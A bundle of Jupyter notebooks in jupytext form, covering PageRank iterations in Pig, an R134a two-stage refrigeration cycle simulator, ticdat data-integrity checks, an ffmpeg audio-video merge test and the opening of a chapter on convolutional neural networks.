st["id"],st["percentComplete"],st["status"]["jobComplete"]
# %tail_stderr job_1435385350894_0001 10
# **Iterations**
# We define a macro to repeat the iterations.
# +
# %%PIG iteration.pig
gr = LOAD '$CONTAINER/$PSEUDO/Projet/SortTest.txt'
USING PigStorage('\t')
AS (DegS:long,Asort:{(frm: int,to: int)},Noeud:int,Noeud2:int,Aent:{(frm: int,to: int)},ID: int,PageRank: float);
Arcs = LOAD '$CONTAINER/$PSEUDO/Data/DataTEST.txt'
USING PigStorage('\t')
AS (frm:int,to:int);
Graph = FOREACH gr
GENERATE Noeud , DegS, PageRank AS Pinit, PageRank, PageRank/ (float) DegS AS Ratio;
DEFINE my_macro(G,A,ALP) RETURNS S {
Gi= FOREACH $G GENERATE Noeud , Ratio;
GrEntr = JOIN $A BY frm , Gi BY Noeud ;
Te = GROUP GrEntr BY to;
so = FOREACH Te GENERATE SUM(GrEntr.Ratio) AS Pr, group AS ID;
tu = JOIN $G BY Noeud, so BY ID;
sort = FOREACH tu GENERATE Noeud , DegS, Pinit, $ALP*Pinit+(1-$ALP)*Pr AS PageRank;
$S = FOREACH sort GENERATE Noeud , DegS, Pinit, PageRank, PageRank/ (float) DegS AS Ratio;
}
Ite1 = my_macro(Graph,Arcs,$alpha);
Ite2 = my_macro(Ite1,Arcs,$alpha);
Ite3 = my_macro(Ite2,Arcs,$alpha);
Ite4 = my_macro(Ite3,Arcs,$alpha);
Ite5 = my_macro(Ite4,Arcs,$alpha);
Ite6 = my_macro(Ite5,Arcs,$alpha);
Ite7 = my_macro(Ite6,Arcs,$alpha);
Ite8 = my_macro(Ite7,Arcs,$alpha);
DUMP Ite1;
DUMP Ite8;
# -
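# The macro above performs one PageRank update per call: each node's new
# score is `$ALP*Pinit + (1-$ALP)*Pr`, where `Pr` sums the incoming `Ratio`
# values (current score divided by out-degree). As a sanity check, here is a
# plain-Python sketch of the same update applied eight times to the small
# test graph, independently of the cluster:

```python
# Plain-Python mirror of the PIG iteration macro on the small test graph.
edges = [(1, 2), (1, 4), (2, 3), (2, 5), (3, 4),
         (4, 5), (5, 3), (5, 1), (5, 2)]

out_deg = {}
for frm, _ in edges:
    out_deg[frm] = out_deg.get(frm, 0) + 1

nodes = sorted({n for e in edges for n in e})
p_init = {node: 1.0 / len(nodes) for node in nodes}  # uniform start, as in Creation_Graph.pig

def iterate(rank, alpha):
    """One update: alpha * p_init + (1 - alpha) * (sum of incoming ratios)."""
    incoming = {node: 0.0 for node in nodes}
    for frm, to in edges:
        incoming[to] += rank[frm] / out_deg[frm]
    return {node: alpha * p_init[node] + (1 - alpha) * incoming[node]
            for node in nodes}

rank = p_init
for _ in range(8):                   # Ite1 .. Ite8
    rank = iterate(rank, alpha=0.0)  # alpha=0, as in the submission below
print(rank)
```

Since this test graph has no dangling nodes, the scores remain a probability distribution across iterations.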
jid = client.pig_submit(bs,
client.account_name,
"iteration.pig",
params=dict(alpha="0"),
stop_on_failure=True )
jid
# st = %hd_job_status job_1435385350894_0006
st["id"],st["percentComplete"],st["status"]["jobComplete"]
# %tail_stderr job_1435385350894_0006 20
# We can now turn to the real data!
# ### With the Google data
# **Initialization**
# +
# %%PIG Creation_Graph2.pig
Arcs = LOAD '$CONTAINER/$PSEUDO/Data/$path'
USING PigStorage('\t')
AS (frm:int,to:int);
GrSort = GROUP Arcs BY frm;
deg_sort = FOREACH GrSort
GENERATE COUNT(Arcs) AS degs, Arcs , group AS ID;
GrEntr = GROUP Arcs BY to;
GrFin = JOIN deg_sort BY ID,
GrEntr BY group;
N = FOREACH (GROUP GrSort ALL)
GENERATE COUNT(GrSort);
Pr = FOREACH GrFin
GENERATE deg_sort::ID AS ID , (float) 1 / (float)N.$0 AS PageRank;
PageRank = JOIN GrFin BY deg_sort::ID, Pr BY ID;
STORE PageRank
INTO '$CONTAINER/$PSEUDO/Projet/SortGoogle.txt'
USING PigStorage('\t') ;
# -
client.pig_submit(bs, client.account_name, "Creation_Graph2.pig", params=dict(path="DataGoogle.txt"), stop_on_failure=True )
# st = %hd_job_status job_1435385350894_0037
st["id"],st["percentComplete"],st["status"]["jobComplete"]
# %tail_stderr job_1435385350894_0037 20
# +
# %%PIG iteration2.pig
gr = LOAD '$CONTAINER/$PSEUDO/Projet/SortGoogle.txt'
USING PigStorage('\t')
AS (DegS:long,Asort:{(frm: int,to: int)},Noeud:int,Noeud2:int,Aent:{(frm: int,to: int)},ID: int,PageRank: float);
Arcs = LOAD '$CONTAINER/$PSEUDO/Data/DataGoogle.txt'
USING PigStorage('\t')
AS (frm:int,to:int);
Graph = FOREACH gr
GENERATE Noeud , DegS, PageRank AS Pinit, PageRank, PageRank/ (float) DegS AS Ratio;
DEFINE my_macro(G,A,ALP) RETURNS S {
Gi= FOREACH $G GENERATE Noeud , Ratio;
GrEntr = JOIN $A by frm , Gi by Noeud ;
Te = GROUP GrEntr by to;
so = FOREACH Te generate SUM(GrEntr.Ratio) AS Pr, group AS ID;
tu = JOIN $G by Noeud, so by ID;
sort = FOREACH tu GENERATE Noeud , DegS, Pinit, $ALP*Pinit+(1-$ALP)*Pr AS PageRank;
$S = FOREACH sort GENERATE Noeud , DegS, Pinit, PageRank, PageRank/ (float) DegS AS Ratio;
}
Ite1 = my_macro(Graph,Arcs,$alpha);
Ite2 = my_macro(Ite1,Arcs,$alpha);
Ite3 = my_macro(Ite2,Arcs,$alpha);
Ite4 = my_macro(Ite3,Arcs,$alpha);
Ite5 = my_macro(Ite4,Arcs,$alpha);
Ite6 = my_macro(Ite5,Arcs,$alpha);
Ite7 = my_macro(Ite6,Arcs,$alpha);
Ite8 = my_macro(Ite7,Arcs,$alpha);
DUMP Ite1;
DUMP Ite8;
STORE Ite8 INTO '$CONTAINER/$PSEUDO/Projet/PageRank.txt' USING PigStorage('\t') ;
# -
client.pig_submit(bs,
client.account_name,
"iteration2.pig",
params=dict(alpha="0.5"),
stop_on_failure=True )
# st = %hd_job_status job_1435385350894_0042
st["id"],st["percentComplete"],st["status"]["jobComplete"]
# %tail_stderr job_1435385350894_0042 20
# %blob_downmerge /$PSEUDO/Projet/PageRank.txt PageRank.txt
# +
import pandas
import matplotlib.pyplot as plt
plt.style.use('ggplot')
df = pandas.read_csv("PageRank.txt", sep="\t",names=["Node","OutDeg","Pinit", "PageRank", "k"])
df
df['PageRank'].hist(bins=100, range=(0,0.000005))
# -
df.sort_values("PageRank",ascending=False).head()
# %blob_close
|
_unittests/ut_helpgen/data_gallery/notebooks/notebook_eleves/2014_2015/2015_page_rank.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Multistage Compression Refrigeration Cycle
#
# * SimVCCE Branch :B2023-2
# ## 1 The Two-stage Compression Refrigeration Cycle
#
# > <NAME>, <NAME>, Thermodynamics: An Engineering Approach, 8th Edition, McGraw-Hill, 2015
# >
# > EXAMPLE 11–4: Multistage Compression Refrigeration: Page 627-628
#
# **EXAMPLE 11–5 Two-Stage Refrigeration Cycle with a Flash Chamber, Page 627-628**
#
# Consider a two-stage compression refrigeration system operating between the pressure limits of 0.8 and 0.14 MPa.
#
# 
#
# The working fluid is R134a.
#
# The refrigerant leaves the condenser as a saturated liquid and is throttled to a flash chamber operating at 0.32 MPa.
#
# Part of the refrigerant evaporates during this flashing process, and this vapor is mixed with the refrigerant leaving the low-pressure compressor.
#
# The mixture is then compressed to the condenser pressure by the high-pressure compressor.
#
# The liquid in the flash chamber is throttled to the evaporator pressure and cools the refrigerated space as it vaporizes in the evaporator.
#
# Assuming the refrigerant leaves the evaporator as a saturated vapor and both compressors are isentropic,
#
# **Determine**
#
# * (a) the fraction of the refrigerant that evaporates as it is throttled to the flash chamber,
# * (b) the amount of heat removed from the refrigerated space and the compressor work per unit mass of refrigerant flowing through the condenser, and
# * (c) the coefficient of performance.
#
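# Before building the device classes, note that part (a) reduces to a simple
# energy balance: throttling is isenthalpic, so the flashed vapor fraction is
# the quality at the flash-chamber pressure. A minimal sketch, where the
# enthalpies are illustrative placeholders and NOT the textbook's R134a
# property-table values:

```python
# Energy-balance sketch for part (a). Throttling valves are isenthalpic, so
# the vapor fraction produced in the flash chamber is the quality
# x6 = (h6 - h_f) / (h_g - h_f) at the flash pressure.
h6 = 95.0    # kJ/kg, sat. liquid leaving the condenser at 0.8 MPa (assumed)
h_f = 55.0   # kJ/kg, sat. liquid at the 0.32 MPa flash pressure (assumed)
h_g = 251.0  # kJ/kg, sat. vapor at the 0.32 MPa flash pressure (assumed)

x6 = (h6 - h_f) / (h_g - h_f)  # fraction flashed to vapor
print(f"fraction flashed to vapor: {x6:.4f}")
```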
# ## 2 The Analysis
#
# ### 2.1 The New Device Classes
#
# * Flash Chamber
#
# * Mixing Chamber
# #### 2.1.1 Flash Chamber
# +
# # %load ../../SimVCCE/vccpython/components/flashchamber.py
"""
class FlashChamber
↓ iPort
┌─────┴─────┐
│ │
│ │→ oPortV
│────────── │
└─────┬─────┘
↓ oPortL
json example:
{
"name": "flashchamber",
"devtype": "FLASH_CHAMBER",
"iPort": {
"p": 0.6
},
"oPortL": {
"x": 0.0
},
"oPortV": { "x": 1.0
}
},
"""
from components.port import Port
class FlashChamber:
energy = "none"
devtype = "FLASH_CHAMBER"
def __init__(self, dictDev):
"""
        Initializes FlashChamber
"""
self.name = dictDev['name']
self.iPort = Port(dictDev['iPort'])
self.oPortV = Port(dictDev['oPortV'])
self.oPortL = Port(dictDev['oPortL'])
    def state(self):
        # propagate the one known pressure to the other two ports
        if self.iPort.p is not None:
            self.oPortV.p = self.iPort.p
            self.oPortL.p = self.iPort.p
        elif self.oPortL.p is not None:
            self.oPortV.p = self.oPortL.p
            self.iPort.p = self.oPortL.p
        elif self.oPortV.p is not None:
            self.oPortL.p = self.oPortV.p
            self.iPort.p = self.oPortV.p
def balance(self):
"""flash chamber """
oPortV_fdot =self.iPort.x
oPortL_fdot =1.0-self.iPort.x
self.oPortV.mdot = self.iPort.mdot*oPortV_fdot
self.oPortL.mdot = self.iPort.mdot*oPortL_fdot
def __str__(self):
result = '\n' + self.name
result += '\n' + " PORT " + Port.title
result += '\n' + " iPort "+self.iPort.__str__()
result += '\n' + " oPortV " + self.oPortV.__str__()
result += '\n' + " oPortL " + self.oPortL.__str__()
return result
# -
# #### 2.1.2 Mixing Chamber
# +
# # %load ../../SimVCCE/vccpython/components/mixingchamber.py
"""
MixingChamber
↑ oPort
┌─────┴─────┐
│ │
→ │ │
iPort0 │ │
└─────┬─────┘
↑ iPort1
json example:
{
"name": "mixingchamber",
"devtype": "MIXING_CHAMBER",
"iPort0": {
"x": 1.0
},
"iPort1": {
},
"oPort": {
"p": 0.6
}
}
"""
from components.port import Port
class MixingChamber:
energy = "none"
devtype = "MIXING_CHAMBER"
def __init__(self, dictDev):
"""
        Initializes MixingChamber
"""
self.name = dictDev['name']
self.iPort0 = Port(dictDev['iPort0'])
self.iPort1 = Port(dictDev['iPort1'])
self.oPort = Port(dictDev['oPort'])
def state(self):
if self.iPort0.p is not None:
self.oPort.p = self.iPort0.p
self.iPort1.p = self.iPort0.p
elif self.iPort1.p is not None:
self.iPort0.p = self.iPort1.p
self.oPort.p = self.iPort1.p
        elif self.oPort.p is not None:
            self.iPort0.p = self.oPort.p
            self.iPort1.p = self.oPort.p
def balance(self):
self.oPort.mdot = self.iPort0.mdot+self.iPort1.mdot
self.oPort.h = (self.iPort0.mdot*self.iPort0.h +
self.iPort1.mdot*self.iPort1.h)/self.oPort.mdot
def __str__(self):
result = '\n' + self.name
result += '\n' + " PORT " + Port.title
result += '\n' + " iPort0 "+self.iPort0.__str__()
result += '\n' + " iPort1 " + self.iPort1.__str__()
result += '\n' + " oPort " + self.oPort.__str__()
return result
# -
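# The `balance` method above is just a steady-flow mass and energy balance.
# A minimal standalone check with hypothetical port values (no `Port` class
# required):

```python
# Standalone check of the mixing-chamber balance: mass in equals mass out,
# and the outlet enthalpy is the mass-weighted average of the inlet enthalpies.
mdot0, h0 = 0.2, 251.9   # vapor from the flash chamber (assumed values)
mdot1, h1 = 0.8, 255.9   # vapor leaving the LP compressor (assumed values)

mdot_out = mdot0 + mdot1
h_out = (mdot0 * h0 + mdot1 * h1) / mdot_out
print(mdot_out, round(h_out, 3))
```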
# #### 2.1.3 `__init__.py`
#
#
# +
# # %load ../../SimVCCE/vccpython/components/__init__.py
"""
General Object-oriented Abstraction of VC Cycle
Components Package : port and devices
Author: <NAME> <EMAIL>
"""
from .compressor import Compressor
from .condenser import Condenser
from .expansionvalve import ExpansionValve
from .evaporator import Evaporator
# add the new device class
from .flashchamber import FlashChamber
from .mixingchamber import MixingChamber
# ------------------------------------------------------------------------------
# compdict
# typedev: class
# Note: add typedev: class to the dict after you add the new device class
# --------------------------------------------------------------------------------
compdict = {
Compressor.devtype: Compressor,
Condenser.devtype: Condenser,
ExpansionValve.devtype: ExpansionValve,
Evaporator.devtype: Evaporator,
# add the new device class
FlashChamber.devtype: FlashChamber,
MixingChamber.devtype: MixingChamber
}
# -
# ### 2.2 The Modified Sequential-modular Approach
#
# * Branch 2023-2
#
# **Sequential-modular approach (SM):**
#
# * Process **units** are solved in <b style="color:blue">sequence</b>
#
# ```python
# def __component_simulator(self):
# # 2 the ports state of device
# for key in self.comps:
# self.comps[key].state()
#
# # 3 the nodes state of connectors
# for item in self.conns.nodes:
# if item.stateok == False:
# item.state()
# # 4 comps[key].balance()
# for curdev in self.comps:
# self.comps[curdev].balance()
#
# ```
# ---
# But, there are **dependencies** between the **mass flow rate** and the **port state** calculations.
#
# For example: The **Mixing Chamber** in a two-stage compression refrigeration cycle
#
# * The **fraction** of refrigerant that flashes to vapor is not known from the **Flash Chamber**
#
# * The **inlet refrigerant state** from the **low-pressure compressor** is not known
#
# then,
#
# * the outlet refrigerant state of the **mixing chamber** is not known
#
# * the outlet refrigerant state of the **high-pressure compressor** is not known
#
# 
#
# If we do **not** yet have the **mass flow rate** or **port states** of a device,
#
# **the simple sequence may fail!**
#
#
# In this example, we provide one general method to deal with mass flow rate and port-state failures:
#
# ```python
# def __component_simulator(self):
# state_nodes = self.conns.nodes.copy()
#
# keys = list(self.comps.keys())
# deviceok = False
# CountsDev = len(self.comps)
# i = 0 # i: the count of deviceok to avoid endless loop
# while (deviceok == False and i <= CountsDev):
# for curdev in keys:
# try:
# # step 2: the port state: thermal process
# self.comps[curdev].state()
#
# # step 3 the port state: new port's parameter pairs
# for port in state_nodes:
# if port.stateok == False:
# port.state()
# if port.state() == True:
# state_nodes.remove(port)
#
# # step 4: the port state :the energy and mass balance
# self.comps[curdev].balance()
# keys.remove(curdev)
# except:
# pass
#
# i += 1
# if (len(keys) == 0):
# deviceok = True
#
# if len(keys) > 0:
# print(keys) # for debug
#
# ```
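# The loop above amounts to: keep sweeping the device list, skipping any
# device whose inputs are not ready yet, until a full sweep solves everything
# (or the sweep budget runs out). A toy standalone sketch of that retry
# pattern, using hypothetical devices rather than the SimVCCE classes:

```python
# Toy sketch of the retry loop: each "device" can only be solved once the
# values it depends on exist; unsolved devices raise and are retried.
values = {"condenser.in": 100.0}   # the only value known up front (assumed)

def solve_condenser():
    values["condenser.out"] = values["condenser.in"] - 40.0

def solve_valve():
    values["valve.out"] = values["condenser.out"]   # KeyError until condenser solved

def solve_evaporator():
    values["evaporator.out"] = values["valve.out"] + 30.0

# Deliberately bad order: the dependencies come last.
devices = {"evaporator": solve_evaporator, "valve": solve_valve,
           "condenser": solve_condenser}

pending = list(devices)
sweeps = 0
while pending and sweeps <= len(devices):
    for name in list(pending):
        try:
            devices[name]()
            pending.remove(name)
        except KeyError:        # inputs not ready yet -- retry on the next sweep
            pass
    sweeps += 1
print(pending, values["evaporator.out"])
```

Three sweeps suffice here: the condenser solves first, then the valve, then the evaporator.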
# +
# # %load ../../SimVCCE/vccpython/vcc/vccobj.py
"""
General Object-oriented Abstraction of VC Cycle
class VCCycle: the Simulator class of VC Cycle
Author: <NAME> <EMAIL>
"""
from time import time, localtime, strftime
from getpass import getuser
from components import compdict
from components.port import Port
from .connector import Connector
class VCCycle:
def __init__(self, dictcycle):
"""
dictcycle={"name":namestring,
"refrigerant":refrigerantstring,
"components":[{component1},{component2},...],
"connectors":{"name1.port1":"name2.port2",...}
}
TO:
self.comps : dict of all component objects
self.conns : the connector object
"""
self.name = dictcycle["name"]
self.cycle_refrigerant = dictcycle["refrigerant"]
Port.cycle_refrigerant = self.cycle_refrigerant
# 1 convert dict to the dict of device objects: {device name:device obiect}
self.comps = {}
for curdev in dictcycle["components"]:
self.comps[curdev['name']] = compdict[curdev['devtype']](curdev)
# 2 set the nodes value and alias between the item of nodes and the port of devices
self.conns = Connector(dictcycle["connectors"], self.comps)
def __component_simulator(self):
state_nodes = self.conns.nodes.copy()
keys = list(self.comps.keys())
deviceok = False
CountsDev = len(self.comps)
i = 0 # i: the count of deviceok to avoid endless loop
while (deviceok == False and i <= CountsDev):
for curdev in keys:
try:
# step 2: the port state: thermal process
self.comps[curdev].state()
# step 3 the port state: new port's parameter pairs
for port in state_nodes:
if port.stateok == False:
port.state()
if port.state() == True:
state_nodes.remove(port)
# step 4: the port state :the energy and mass balance
self.comps[curdev].balance()
keys.remove(curdev)
except:
pass
i += 1
if (len(keys) == 0):
deviceok = True
if len(keys) > 0:
print(keys) # for debug
def simulator(self):
self.__component_simulator()
self.Wc = 0.0
self.Qin = 0.0
self.Qout = 0.0
for key in self.comps:
if self.comps[key].energy == "CompressionWork":
self.Wc += self.comps[key].Wc
elif self.comps[key].energy == "QIN":
self.Qin += self.comps[key].Qin
elif self.comps[key].energy == "QOUT":
self.Qout += self.comps[key].Qout
self.cop = self.Qin / self.Wc
self.cop_hp = self.Qout / self.Wc
def __str__(self):
curtime = strftime("%Y/%m/%d %H:%M:%S", localtime(time()))
result = f"\nThe Vapor-Compression Cycle: {self.name} ({curtime} by {getuser()})\n"
result += f"\nRefrigerant: {self.cycle_refrigerant}\n"
        result_items = {'Compression Work(kW): ': self.Wc,
                        'Refrigeration Capacity(kW): ': self.Qin,
                        '\tCapacity(ton): ': self.Qin*60*(1/211),
                        'The heat transfer rate(kW): ': self.Qout,
                        'The coefficient of performance: ': self.cop,
                        'The coefficient of performance(heat pump):': self.cop_hp}
        for name, value in result_items.items():
            result += f'{name:>35} {value:{">5.2f" if type(value) is float else ""}}\n'
return result
# -
#
# ### 2.3 The JSON of Cycles
#
# # %load ../../SimVCCE/vccpython/jsonmodel/vcr_two_stage_11_5.json
{
"name": "The_TWO_STAGE_11_5",
"refrigerant": "R134a",
"components": [
{
"name": "Compressor_HP",
"devtype": "COMPRESSOR",
"iPort": {
"p": 0.32,
"mdot": 1.0
},
"oPort": {
"p": 0.8
},
"ef": 1.0
},
{
"name": "Compressor_LP",
"devtype": "COMPRESSOR",
"iPort": {
"p": 0.14
},
"oPort": {
"p": 0.32
},
"ef": 1.0
},
{
"name": "ExpansionValve1",
"devtype": "EXPANSIONVALVE",
"iPort": {
"p": 0.8,
"x": 0.0
},
"oPort": {
"p": 0.32
}
},
{
"name": "ExpansionValve2",
"devtype": "EXPANSIONVALVE",
"iPort": {
"p": 0.32
},
"oPort": {}
},
{
"name": "Condenser",
"devtype": "CONDENSER",
"iPort": {
"p": 0.8
},
"oPort": {
"p": 0.8,
"x": 0.0
}
},
{
"name": "Flash_Chamber",
"devtype": "FLASH_CHAMBER",
"iPort": {
"p": 0.32
},
"oPortL": {
"p": 0.32,
"x": 0.0
},
"oPortV": {
"p": 0.32,
"x": 1.0
}
},
{
"name": "Evaporator",
"devtype": "EVAPORATOR",
"iPort": {},
"oPort": {
"p": 0.14,
"x": 1.0
}
},
{
"name": "Mixing_Chamber",
"devtype": "MIXING_CHAMBER",
"iPort0": {
"p": 0.32,
"x": 1
},
"iPort1": {
"p": 0.32
},
"oPort": {
"p": 0.32
}
}
],
"connectors": {
"Compressor_HP.oPort": "Condenser.iPort",
"Condenser.oPort": "ExpansionValve1.iPort",
"ExpansionValve1.oPort": "Flash_Chamber.iPort",
"Flash_Chamber.oPortV": "Mixing_Chamber.iPort0",
"Flash_Chamber.oPortL": "ExpansionValve2.iPort",
"ExpansionValve2.oPort": "Evaporator.iPort",
"Evaporator.oPort": "Compressor_LP.iPort",
"Compressor_LP.oPort": "Mixing_Chamber.iPort1",
"Mixing_Chamber.oPort": "Compressor_HP.iPort"
}
}
# ### 2.4 The Main Application
#
# * vccapp_json.py
#
# +
# # %load ../../SimVCCE/vccpython/vccapp_json.py
"""
General Object-oriented Abstraction of VC Cycle
<NAME>, <NAME>, Thermodynamics: An Engineering Approach, 8th Edition,McGraw-Hill, 2015.
The Simulator of VC Cycle
* Input :the json file of the cycle model
* Output: text file
Run:
python vccapp_json.py
Author: <NAME> <EMAIL>
"""
import json
import os
import glob
from vcc.vccobj import VCCycle
from vcc.utils import OutFiles
if __name__ == "__main__":
curpath = os.path.abspath(os.path.dirname(__file__))
ResultFilePath = curpath+'/result/'
    json_filenames_str = os.path.join(curpath, "jsonmodel", "*.json")
json_filenames = glob.glob(json_filenames_str)
for i in range(len(json_filenames)):
with open(json_filenames[i], 'r') as f:
thedictcycle = json.loads(f.read())
# the simulator
cycle = VCCycle(thedictcycle)
cycle.simulator()
# output to console
OutFiles(cycle)
# output to the file
ResultFileName = ResultFilePath+thedictcycle['name']
OutFiles(cycle, ResultFileName + '.txt')
# -
# !python ../../SimVCCE/vccpython/vccapp_json.py
# ## 3 glob- Unix style pathname pattern expansion
#
# * https://docs.python.org/3/library/glob.html
#
# The `glob` module finds all the **pathnames** matching a specified **pattern** according to the rules used by the Unix shell, although results are returned in arbitrary order.
#
# **pattern**: *
import glob
glob.glob('./Unit4*.ipynb')
# **pattern:** [2-4]
glob.glob('./Unit4-[2-4]-*.ipynb')
# **pattern:** ?
#
glob.glob('./Unit4-?-RefrigerationCycle*.ipynb')
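# `glob` also supports recursive matching with `**` when `recursive=True`.
# A self-contained sketch using a temporary directory:

```python
import glob
import os
import tempfile

# Recursive matching with "**" requires recursive=True.
with tempfile.TemporaryDirectory() as root:
    os.makedirs(os.path.join(root, "sub", "deeper"))
    for p in ("a.ipynb",
              os.path.join("sub", "b.ipynb"),
              os.path.join("sub", "deeper", "c.txt")):
        open(os.path.join(root, p), "w").close()

    hits = glob.glob(os.path.join(root, "**", "*.ipynb"), recursive=True)
    rel = sorted(os.path.relpath(h, root) for h in hits)
print(rel)
```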
|
notebook/Unit4-6-RefrigerationCycle_Multistage.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Addressing dirty data with ticdat
#
# Dirty data is an unloved and often overlooked challenge when building analytical models. A typical assumption is that the input data to a model will somehow magically be clean. In reality, there are any number of reasons why dirty data might be passed as input to your engine. The data might be munged together from different systems, the requirements of your data model might be poorly understood, or a user might be simply pushing your model to its limits via what-if analysis. Regardless of the cause, a professional engine will respond gracefully when passed input data that violates basic integrity checks.
#
# `ticdat` allows for a data scientist to define data integrity checks for 4 different categories of problems (in addition to checking for the correct table and field names).
# 1. Duplicate rows (i.e. duplicate primary key entries in the same table).
# 1. Data type failures. This checks each column for correct data type, legal ranges for numeric data, acceptable flagging strings, nulls present only for columns that allow null, etc.
# 1. Foreign key failures, which check that each record of a child table can cross-reference into the appropriate parent table.
# 1. Data predicate failures. This checks each row for conditions more complex than the data type failure checks. For example, a maximum column can not be allowed to be smaller than the minimum column.
#
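# As a rough illustration of what the first and third categories mean (plain
# Python for exposition, not the `ticdat` API), consider a child table with a
# duplicated primary key and a dangling foreign key:

```python
from collections import Counter

# Hypothetical mini data set: (Food, Category, Quantity) child rows plus the
# parent Foods table they should cross-reference into.
foods = {"milk", "chicken", "macaroni"}
nutrition_quantities = [
    ("milk", "fat", 2.0),
    ("milk", "fat", 3.0),        # duplicate primary key ("milk", "fat")
    ("pizza", "calories", 100),  # "pizza" has no matching Foods record
]

# Category 1: duplicate rows -- primary-key tuples seen more than once.
pks = Counter((food, cat) for food, cat, _ in nutrition_quantities)
duplicates = {pk for pk, n in pks.items() if n > 1}

# Category 3: foreign-key failures -- child rows with no parent record.
fk_failures = {food for food, _, _ in nutrition_quantities if food not in foods}
print(duplicates, fk_failures)
```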
# For a `ticdat` app deployed on Enframe, there will be a dedicated subsection of the input tables dedicated to diagnosing data integrity problems. This subsection is populated whenever an app is solved. There is also an integrity "Action" that can be launched to look for data integrity problems independently of the solve process.
#
# For a data scientist working offline, `ticdat` provides bulk-query routines that can be used from within a notebook. We briefly tour these routines below. Please consult the docstrings for more information regarding their utility.
import ticdat
from diet import input_schema
# First, we quickly check that the csv files in `diet_sample_data` represent clean data. The `ticdat` bulk query routines all return "falsey" results on clean data sets.
dat = input_schema.csv.create_tic_dat("diet_sample_data")
any(_ for _ in [input_schema.csv.find_duplicates("diet_sample_data"),
input_schema.find_data_type_failures(dat),
input_schema.find_foreign_key_failures(dat),
input_schema.find_data_row_failures(dat)])
# Next, we examine the `diet_dirty_sample_data` data set, which has been deliberately seeded with dirty data.
#
# We first check for duplicate rows. Note that since the dict-of-dict format that `TicDat` uses will remove any row duplications when representing a data set in memory, we must check for duplications on the csv files directly. Similar duplication checking routines are provided for all the `TicDatFactory` readers.
input_schema.csv.find_duplicates("diet_dirty_sample_data")
# `ticdat` is telling us that there are two different records in the Nutrition Quantities table defining the amount of fat in milk. This can be easily confirmed by manually inspecting the "nutrition_quantities.csv" file in the "diet_dirty_sample_data" directory. In a real-world data set, manual inspection would be impossible and such a duplication would be easily overlooked.
dat = input_schema.csv.create_tic_dat("diet_dirty_sample_data")
input_schema.find_data_type_failures(dat)
{tuple(k): v.pks for k, v in input_schema.find_data_type_failures(dat).items()}
# `ticdat` is telling us that there are two rows which have bad values in the Quantity field of the Nutrition Quantities table. In both cases, the problem is an empty data cell where a number is expected. The rows with this problem are those which specify the quantity for `('macaroni', 'calories')` and `('chicken', 'fat')`. As before, these two errant rows can easily be double checked by manually examining "nutrition_quantities.csv".
input_schema.find_foreign_key_failures(dat, verbosity="Low")
# Here, `ticdat` is telling us that there are 4 records in the Nutrition Quantities table that fail to cross reference with the Foods table. In all 4 cases, it is specifically the "pizza" string in the Food field that fails to find a match from the Name field of the Foods table. If you manually examine "foods.csv", you can see this problem arose because the Foods table was altered to have a "pizza pie" entry instead of a "pizza" entry.
input_schema.find_data_row_failures(dat)
# Here, `ticdat` is telling us that the "Min Max Check" (i.e. the check that `row["Max Nutrition"] >= row["Min Nutrition"]`) failed for the "fat" record of the Categories table. This is easily verified by manual inspection of "categories.csv".
|
examples/gurobipy/diet/ticdat_and_dirty_data.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import imageio
import cv2
import subprocess
import librosa
import soundfile as sf
import sys
import os
# load frames
frames = []
for i in range(120):
frames.append(imageio.imread("input_photos/you_me_and_ever.jpg"))
# write video no audio
out_video_path = 'output_video/test_video_only.avi'
writer = imageio.get_writer(out_video_path, fps=30)
for f in frames:
writer.append_data(f)
writer.close()
# write audio file
out_audio_path = 'output_video/test_audio_only.wav'
data, sr = librosa.load('audio/disclosure.wav', offset=90.0, duration=4.0)
sf.write(out_audio_path, data, sr)
# +
# combine with ffmpeg
in_audio = "'" + os.getcwd() + r"\output_video\test_audio_only.wav'"
in_video = "'" + os.getcwd() + r"\output_video\test_video_only.avi'"
out_path = "'" + os.getcwd() + r"\output_video\test_audio_video.avi'"
# in_audio = r"'output_video\test_audio_only.wav'"
# in_video = r"'output_video\test_video_only.avi'"
# out_path = r"'output_video\test_audio_video.avi'"
# in_audio = os.getcwd() + r"\output_video\test_audio_only.wav"
# in_video = os.getcwd() + r"\output_video\test_video_only.avi"
# out_path = os.getcwd() + r"\output_video\test_audio_video.avi"
command = 'ffmpeg -i ' + in_video + ' -i ' + in_audio + ' -c copy -map 0:v:0 -map 1:a:0 ' + out_path
print(command)
print(command.split())
subprocess.call(command, shell=True)
# -
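# Note that building the command as a single string with embedded quotes and
# `shell=True` is fragile (single quotes are not stripped by `cmd.exe` on
# Windows). Passing an argument list sidesteps quoting entirely; a sketch
# with hypothetical paths:

```python
import os
import subprocess

# Building the ffmpeg call as an argument list means no manual quoting, and
# paths with spaces pass through verbatim.
in_video = os.path.join("output_video", "test_video_only.avi")
in_audio = os.path.join("output_video", "test_audio_only.wav")
out_path = os.path.join("output_video", "test_audio_video.avi")

cmd = ["ffmpeg", "-y",
       "-i", in_video,
       "-i", in_audio,
       "-c", "copy", "-map", "0:v:0", "-map", "1:a:0",
       out_path]
print(cmd)
# subprocess.run(cmd, check=True)  # uncomment to actually invoke ffmpeg
```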
os.getcwd()
|
prototype/test_movie_write.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# ---
# + [markdown] origin_pos=0
# # Convolutional Neural Networks
# :label:`chap_cnn`
#
# In earlier chapters, we came across image data. Each example in such data
# consists of a two-dimensional grid of pixels, where each pixel is one or
# more numerical values depending on whether the image is black-and-white or
# in color. Until now, our way of handling this richly structured data has
# not been very effective: we simply flattened each image into a
# one-dimensional vector, ignoring its spatial structure, before feeding it
# into a fully connected MLP. Because these networks are invariant to the
# order of their features, the best we could hope for was to exploit prior
# knowledge, namely the correlation between nearby pixels, to learn effective
# models from image data.
#
# This chapter introduces *convolutional neural networks* (CNNs), a powerful
# family of neural networks designed precisely for processing image data.
# CNN-based architectures are now dominant in computer vision: today, almost
